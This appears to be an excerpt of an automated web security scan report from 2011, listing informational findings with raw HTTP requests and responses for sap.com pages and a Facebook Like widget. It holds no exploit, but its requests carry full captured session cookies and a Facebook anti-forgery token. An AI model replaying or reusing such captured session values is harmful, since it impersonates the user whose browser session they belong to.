GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.118.33
X-Cnection: close
Date: Sat, 15 Oct 2011 14:30:22 GMT
Content-Length: 25160

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e9998fe13e148772655964" class="connect_widget button_count" style="font-family: &quot;tahoma&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">87</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">86</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"a07cefb7",fb_dtsg:"AQBV7Aj0",ajaxpipe_token:"AXi6qNTYNK5sNg8L",no_cookies:1,lhsh:"kAQBAgKRS"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f2d1e4dc8&origin=http\u00253A\u00252F\u00252Fwww.sapvirtualevents.com\u00252Ff59d1fcc&relation=parent.parent&transport=postmessage","mobile":false,"nodeType":"link","externalURL":"http:\/\/sapvirtualevents.com\/teched\/","pageId":null,"widgetID":"conn
...[SNIP]...
15.2. http://www.sap.com/about-sap/events/worldtour/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sap.com
Path:   /about-sap/events/worldtour/index.epx

Request 1

GET /about-sap/events/worldtour/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:44:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:44:50 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:44:50 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:44:50 GMT
Content-Length: 42136



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascript" type="text/javascript" src="/global/js/jquery-1_3_2/jquery-1.3.2.min.js"></script>
<script language="javascript" type="text/javascript" src="/global/js/rm_js/rm_dhtml.js"></script>
<script language="javascript" type="text/javascript" src="/global/js/rm_js/rm_browser.js"></script>
<script language="javascript" type="text/javascript" src="/global/js/rm_js/rm_iframe.js"></script>
<link rel="stylesheet" type="text/css" href="/global/css/rm_css/rm_iframe_css.css" />
<script language="javascript" type="text/javascript" src="/global/js/FormEngine.js"></script>
<link rel="stylesheet" type="text/css" media="all" href="/global/ui/css/securelayers.css" />
<script type="text/javascript" src="/global/ui/js/common.js"></script>
<script type="text/javascript" src="/global/ui/js/securelayers.js"></script>
<script type="text/javascript" src="/global/ui/js/securedforms.js"></script>

<script language="javascript" type="text/javascript" src="/global/ui/js/trackinghelper.js"></script>




<title>SAP - SAP World Tour 2011</title>
<meta http-equiv="Content-Language" content="en-U
...[SNIP]...

Request 2

GET /about-sap/events/worldtour/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:46:21 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:46:21 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:46:21 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:46:22 GMT
Content-Length: 42136



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascript" type="text/javascript" src="/global/js/jquery-1_3_2/jquery-1.3.2.min.js"></script>
<script language="javascript" type="text/javascript" src="/global/js/rm_js/rm_dhtml.js"></script>
<script language="javascript" type="text/javascript" src="/global/js/rm_js/rm_browser.js"></script>
<script language="javascript" type="text/javascript" src="/global/js/rm_js/rm_iframe.js"></script>
<link rel="stylesheet" type="text/css" href="/global/css/rm_css/rm_iframe_css.css" />
<script language="javascript" type="text/javascript" src="/global/js/FormEngine.js"></script>
<link rel="stylesheet" type="text/css" media="all" href="/global/ui/css/securelayers.css" />
<script type="text/javascript" src="/global/ui/js/common.js"></script>
<script type="text/javascript" src="/global/ui/js/securelayers.js"></script>
<script type="text/javascript" src="/global/ui/js/securedforms.js"></script>

<script language="javascript" type="text/javascript" src="/global/ui/js/trackinghelper.js"></script>




<title>SAP - SAP World Tour 2011</title>
<meta http-equiv="Content-Language" content="en-US" /><meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<link rel="stylesheet" type="text/css" href="/global/unified/css/StageHeaderMa
...[SNIP]...
15.3. http://www.sap.com/gwtservices/verifylogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservices/verifylogin.epx

Request 1

GET /gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:04 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:04 GMT
Content-Length: 21

var sap_token = null;

Request 2

GET /gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:31:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:31:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:31:09 GMT
Content-Length: 21

var sap_token = null;
15.4. http://www.sap.com/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sap.com
Path:   /index.epx

Request 1

GET /index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:53:47 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:53:47 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:53:47 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:53:46 GMT
Content-Length: 20385



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<!--[if !(IE 6)]><!-->
<!--[if IE 7 ]> <html xml:lang="en" lang="en" class="ie7" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<!--[if !(IE 7)]><!-->
<!--[if IE 8 ]> <html xml:lang="en" lang="en" class="ie8" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<!--[if !(IE 8)]> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->
<head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="skin" content="experience" /><link rel="shortcut icon" href="/favicon.ico" /><link rel="stylesheet" type="text/css" media="all" href="/global/ui/css/sapcom.css" /><link rel="stylesheet" type="text/css" media="all" href="/global/ui/css/securelayers.css" /><link rel="stylesheet" type="text/css" media="print" href="/global/ui/css/print.css" />

<script type="text/javascript" src="/global/ui/js/jquery.js"></script>

<!-- Rich Media Scripts -->
<script language="javascript" type="text/javascript" data-main="utils/rm_initializer" src="/global/ui/rich
...[SNIP]...

Request 2

GET /index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:54:54 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:54:54 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:54:53 GMT
Content-Length: 20385



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<!--[if !(IE 6)]><!-->
<!--[if IE 7 ]> <html xml:lang="en" lang="en" class="ie7" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<!--[if !(IE 7)]><!-->
<!--[if IE 8 ]> <html xml:lang="en" lang="en" class="ie8" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<!--[if !(IE 8)]> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->
<head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="skin" content="experience" /><link rel="shortcut icon" href="/favicon.ico" /><link rel="stylesheet" type="text/css" media="all" href="/global/ui/css/sapcom.css" /><link rel="stylesheet" type="text/css" media="all" href="/global/ui/css/securelayers.css" /><link rel="stylesheet" type="text/css" media="print" href="/global/ui/css/print.css" />

<script type="text/javascript" src="/global/ui/js/jquery.js"></script>

<!-- Rich Media Scripts -->
<script language="javascript" type="text/javascript" data-main="utils/rm_initializer" src="/global/ui/richmedia/js/require.js"> </script>
<link rel="stylesheet" type="text/css" href="/global/ui/richmedia/css/UMP/rm_UMP_css.css" />
<!-- / Rich Media Scripts -->

<!-- Dynamic Scripts -->

<script type="text/javascript">

window.CookieDomain = ".sap.com";

...[SNIP]...
15.5. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sap.com
Path:   /profile/login.epx

Request 1

GET /profile/login.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; 